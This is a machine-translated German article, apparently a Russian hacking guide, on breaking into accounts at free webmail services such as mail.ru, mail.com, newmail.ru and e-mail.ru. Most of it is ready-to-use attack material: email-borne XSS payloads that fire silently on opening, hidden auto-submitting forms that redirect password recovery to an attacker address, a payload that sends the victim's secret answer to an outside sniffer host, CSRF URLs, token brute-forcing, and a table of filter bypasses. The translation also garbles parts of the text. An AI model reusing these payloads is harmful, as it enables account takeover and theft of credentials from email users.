This page has been robot translated, sorry for typos if any. Original content here.

ÜBERSICHT ÜBER DIE SCHÄDLICHKEITEN KOSTENLOSER POSTDIENSTE

Wir beschäftigen uns weiterhin mit Web-Mail. Ich habe ein wenig nach verschiedenen Diensten für das Hacken recherchiert und Ihnen die Ergebnisse vorgestellt. Die Angriffstechnologie bleibt unverändert: Eine E-Mail mit einem JavaScript-Code, der beim Öffnen der E-Mail ausgelöst wird, wird an die Adresse einer anderen Person gesendet und ändert alle Informationen in den Postfacheinstellungen des Benutzers. Es macht keinen Sinn, jeden Server im Detail zu beschreiben, da der Ansatz überall gleich ist, daher möchte ich ein paar Beispiele und am Ende eine Tabelle geben. In den meisten Fällen kann das Hacken mit einigen Voraussetzungen als 100% angesehen werden: Der Benutzer muss das Webinterface verwenden, um die Briefe zu lesen, während er die Exploits schreibt, die ich von einer Standardplattform geleitet habe JS-Browser deaktiviert.

WWW.MAIL.RU

Ich werde mit der Nummer 1 in Russland beginnen. Momentan ist es dank der Weitergabe von JavaScript und eines Entwicklerfehlers möglich, dieses Postfach zu knacken. Ich glaube, dass die Grundprinzipien bekannt sind. Wie bekomme ich ein Passwort? 1 - nicht autorisierte ändern. Es wird nicht funktionieren, Sie müssen die zuvor installierten kennen. 2 - Ändern Sie die geheime Frage und verwenden Sie den Dienst, um Amnesie zu bekämpfen. Es wird auch nicht funktionieren. 3 - Legen Sie Ihre alternative E-Mail-Adresse fest, um ein neues, vom System generiertes Kennwort zu erhalten. Es funktioniert nicht, die letzten beiden oben aufgeführten Optionen haben dasselbe Format und sind auch passwortgeschützt. Auch die anderen für uns weniger interessanten Einstellungen (Name, Vorname usw.) können ohne Eingabe des aktuellen Passworts nicht mehr geändert werden. Es scheint, dass es keine Optionen gibt. Es gibt jedoch einen solchen zweitrangigen, unauffälligen Einstellungsbereich "Kontaktinformationen" (ICQ, Website, Telefon, Arbeitsort, Zeitzone usw.). In diesem Abschnitt können Sie auch eine Kontakt-E-Mail angeben. Der Trick ist, dass sich gleichzeitig in den Registrierungsinformationen die alternative Adresse ändert, aber die im Fragebogen registrierte. Jetzt können Sie über den Erinnerungsdienst ein Passwort für die Seife erhalten. Es ist ganz einfach. URL: http://win.mail.ru/cgi-bin/anketa?page=2&Email=hacker@antichat.ru Die GET-Methode kann jedoch keine Einstellungen in der mail.ru-Box ändern. Daher werde ich die technische Seite des Problems ausführlich beschreiben.

I. Wir senden einen Brief mit einem Code an die erforderliche Box mit einem Code, der einen Rahmen direkt im Briefkörper mit einem Link zu unserer Website generiert. Wenn möglich, sollte das Skript ohne Benutzerinteraktion funktionieren (klicken, klicken, mit der Maus darüber fahren, Bild laden usw.):


 <embed src = "javascript: document.getElementById ('xxx'). innerHTML = '<iframe src = http: //yoursite.yourdomain.ru/yourscript.html> </ iframe>'; this.wav">
 <p id = 'xxx'>
Um die vollständige Leistung des Skripts sowie die Maskierung sicherzustellen, transformieren wir Folgendes:
 <embed src = "javascript: status = location; document.getElementById ('xxx'). innerHTML = '<iframe src = http: //yoursite.ru/yourscript.html width = 0 height = 0> </ iframe>' ; this.wav "width = 0 height = 0>
 <p id = 'xxx'>
In diesem Formular ersetzen Zeichencodes die Buchstaben im Namen der Javascript- und Iframe-Elemente, und das Mail-Skript filtert sie nicht. Leitungsstatus = Standort; Erstellt die Sichtbarkeit einer lokalen URL in der Statusleiste, sodass durch ein externes Flimmern kein Verdacht entsteht. Die Attribute width und height, sowohl frame als auch embed, werden auf Null gesetzt und machen sie unsichtbar.

Ii. Auf der http://yoursite.ru-Ressource platzieren wir ein HTML-Dokument mit dem Formular zum Senden der geänderten Daten an den mail.ru-Server.

Inhalt yourscript.html:
 <form method = "post" action = "http://win.mail.ru/cgi-bin/anketa" name = "anketa"> <br>
 <input type = "hidden" name = "page" value = "2"> <br>
 <input type = "hidden" name = "E-Mail" value = "hacker@antichat.ru"> <br>
 <input type = "hidden" value = "Save" name = "Save"> <br>
 </ form> <br>
 <script> <br>
 document.anketa.submit (); <br>
 </ script>
Anmerkungen: Die Arbeit des Client-Teils des Skripts in unveränderter Form ist nur für den IE garantiert. Das Versandformular wird speziell zum „Entladen“ des Briefes an einer separaten Stelle abgelegt.


WWW.MAIL.COM

Nun ein etwas anderer Sicherheitsfehler, zum Beispiel http://mail.com. Wenn Sie den Kennworterinnerungsdienst verwenden, geben Sie einfach die richtige Antwort auf Ihre geheime Frage ein (eine der Optionen), um sie abzurufen. Deshalb haben wir uns die Aufgabe gestellt, diese Antwort zu bekommen. Das geht ganz einfach. Als ich zu den Eigenschaften des Postfachs ging und die Registrierungsinformationen durchsuchte, stellte ich fest, dass die Antwort auf die geheime Frage nicht verborgen war, sodass wir ihren Wert mit JavaScript lesen können.

Wir implementieren das Skript über das Style- Tag.
Adresse der Einstellungsseite: http://mail01.mail.com/scripts/common/genprofile.cgi
Formularname: profileform
Der Name des Textfeldes mit einer geheimen Antwort: hint_a
Um eine geheime Frage zu stehlen, müssen Sie die Einstellungsseite aufrufen, JavaScript ausführen, den Wert von document.profileform.hint_a.value abrufen und zusammen mit der Umgebungsvariablen REQUEST_UR I an den Sniffer übergeben .

Bereitschaftsoption:
 <style> @import url (javascript: document.getElementById ('out'). innerHTML = "<iframe src = http: //mail01.mail.com/scripts/common/genprofile.cgi name = 'zero'% 6FnLoad = str = document.zero.profileform.hint_a.value; path = 'http: //zero.h12.ru/stat/capt.php?'; document.zero.location = path + str`> </ iframe> " ); </ style>
 <span id = 'out'> </ span>
In dem generierten Frame mit dem Namen Null wird die Einstellungsseite geladen. Nachdem der Download abgeschlossen ist, führt der OnLoad-Handler das Skript zum Lesen der geheimen Frage aus und sendet dann über denselben Frame die Antwort an den Sniffer. Gehen Sie jetzt einfach zu http://zero.h12.ru/stat/log.php und finden Sie die erforderlichen Informationen in der Zeile "Host" .

WWW.NEWMAIL.RU

Meiner Meinung nach ein recht beliebter Mailer, daher werde ich darauf noch ausführlich eingehen. Außerdem ist es viel einfacher, das Konto eines anderen einzurichten, als es auf den ersten Blick scheint. Dazu können Sie eine E-Mail mit einem Skript senden, das beim Start die Sitzungs-ID erhält, die erforderlichen Anforderungen generiert und die Einstellungen für die alternative E-Mail (an die das Kennwort später gesendet wird) sowie die geheime Frage und Antwort ändert. Wenn Sie jedoch bei der Erinnerung eine andere Adresse angeben, wird das Kennwort an diese Adresse gesendet, sofern nur die geheime Antwort korrekt ist. Und die folgende Beobachtung: Die Sitzungs-ID zum Ändern der Einstellungen kann überhaupt nicht verwendet werden. Außerdem sind alle Tags zulässig. All dies reduziert die Codemenge auf ein paar Zeilen:
 <iframe src = http: //newmail.ru/users/chpass.dhtml? cp_msg = 1 & cp_quest = QUESTION & cp_answ = ANTWORT width = 0 height = 0> </ iframe> 

WWW.E-MAIL.RU

Die Hacking-Methode von e-mail.ru passt zwar nicht zum allgemeinen Thema des Artikels, aber immer noch - Mail :) . Wenn ich ein Passwort von einer Mailbox erhalten musste, registrierte ich normalerweise mein Konto und begann, das System zu untersuchen. Das erste, was mir aufgefallen ist, war die Möglichkeit, ein neues Passwort und eine geheime Frage mit einer Antwort festzulegen, ohne das alte Passwort eingeben zu müssen. Der übliche Aktionsplan: Überprüfen Sie die Tag-Filterung, ermitteln Sie die ID und führen Sie die Anforderung aus. Zum Ändern der Einstellungen wurde jedoch die spezielle Variable utoken verwendet, die im Hauptteil des Dokuments enthalten ist. Experimentieren Sie mit dem Ändern der Frage und der Antwort mit dem zuvor bekannten Utoken:
http://www.e-mail.ru/scripts/netauth.dll?cmd=passwd2&show=passwd.tpl&utoken=email@e-mail.ru-5a00&show=passwd.tpl&pass=&repass=&pquestion=ВОПРОС&panswer=ОТВЕТ Ich bin gekommen kommt zu dem Schluss, dass ID und Cookies nicht erforderlich sind, um die Einstellungen zu ändern. Gleichzeitig wurde nach Beobachtung von utoken festgestellt, dass die vierstellige Hexadezimalzahl nach der E-Mail-Adresse email@e-mail.ru-5a00 in einem sehr engen Bereich liegt. Um eine geheime Frage mit einer Antwort auf eine für uns interessante Box zu erstellen , müssen insgesamt 7 Optionen durchlaufen werden : 5a00 , 5b00 , 5c00 , 5d00 , 5e00 , 5f00 , 6000 . Wenn die Zahl erraten ist, kommen wir in die richtige Box.

Anmerkungen: Im Moment gab es einige Änderungen. Der Kennwortwiederherstellungsdienst funktioniert nicht. Daher ist es sinnvoll, ihn sofort zu ändern. Die Einstellungen zur Adressänderung wurden ebenfalls geändert:
http://www.e-mail.ru/scripts/netauth.dll?cmd=passwd2&show=passwd.tpl&utoken=email@e-mail.ru-5a00&u_token=email@e-mail.ru-5c00&show=passwd.tpl&pass=&repass=&pquestion=ВОПРОС&panswer=ОТВЕТ Die Methode funktioniert nicht für immer. Vermutlich ist es weiterhin erforderlich, dass der Benutzer von Zeit zu Zeit über das Internet auf die E-Mail zugreift .

Tabelle mit den Eigenschaften freier WWW-Server

SERVER Javascript WUNDERBARKEIT
www.km.ru
km.ru
img src = Javascript: Ermöglicht das Lesen des Passworts von der Einstellungsseite aus dem Passwortfeld
www.mail.ru
inbox.ru , bk.ru , list.ru ,
bette src = Javascript ein: Sie können die alternative E-Mail ändern
www.mail.com
email.com , post.com , myself.com , consultant.com usw.
@ import url (Javascript :); Die Einstellungen zeigen die Antwort auf die geheime Frage.
www.newmail.ru
nm.ru , hotmail.ru , orc.ru , nightmail.ru
Wie auch immer Frage und Antwort lesen / ändern. Passwort ist gültig
www.netman.ru und www.mailgate.ru
gleichen Mailer. etwa 80 Domänen
img src = javascript :, style = background: url (javascript :) Sie können die Antwort auf eine geheime Frage stehlen, wenn sie installiert ist. Es ist auch möglich, eine Weiterleitungsadresse festzulegen (Kopien werden nicht gespeichert).
www.yandex.ru OnError, OnLoad Site löschen * .narod.ru (JS ist nicht erforderlich)
www.ukr.net bette src = javasc ein
ript: this .wav>
Lesen Sie die Antwort auf Ihre geheime Frage.
www.nextmail.ru
xaker.ru , email.su , russian.ru , students.ru , programist.ru , designer.ru , mail2k.ru ,
bette src = "Javascript ein: Antwort auf geheime Frage tauschen / stehlen
www.hotbox.ru
pochta.ru , pisem.net , fromru.com , land.ru und andere.
In vielerlei Hinsicht Ein Konto löschen
www.rin.ru bette src = Javascript ein: Lies die geheime Antwort